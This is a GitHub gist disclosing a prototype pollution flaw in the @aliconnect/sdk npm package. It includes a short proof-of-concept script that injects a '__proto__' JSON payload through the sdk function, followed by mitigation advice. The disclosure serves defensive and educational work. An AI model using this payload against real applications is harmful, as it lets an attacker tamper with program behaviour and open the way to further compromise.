Skip to content

Instantly share code, notes, and snippets.

@tariqhawis

tariqhawis/aliconnect-sdk.md

Last active March 22, 2024 19:47
Show Gist options
  • Save tariqhawis/a8b2c936622c885558173c37df0a77d9 to your computer and use it in GitHub Desktop.
Save tariqhawis/a8b2c936622c885558173c37df0a77d9 to your computer and use it in GitHub Desktop.
Download ZIP
Prototype Pollution Affecting @aliconnect/sdk package
Raw
aliconnect-sdk.md

Affected versions of this package are vulnerable to Prototype Pollution via the sdk function due to missing check if the attribute resolves to the object prototype.

To exploit vulnerability, someone may inject a malicious object from a user controllable input to aim function in aim.js. The input resolves to the object prototype thus modify the behavior of the program.

Poc:

var sdk = require("@aliconnect/sdk")
BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
console.log('before prototype pollution: polluted:', {}.polluted)
sdk({}, BAD_JSON)
console.log('After prototype pollution: polluted:', {}.polluted)

Mitigation:

  1. Freeze the prototype— use Object.freeze (Object.prototype).
  2. Validation of JSON inputs.
  3. Use Map instead of Object.
  4. Crete objects without prototype, that will break the prototype chain and preventing pollution. Example:
let obj = Object.create(null);
obj.__proto__ // undefined
obj.constructor // undefined

Reference

https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment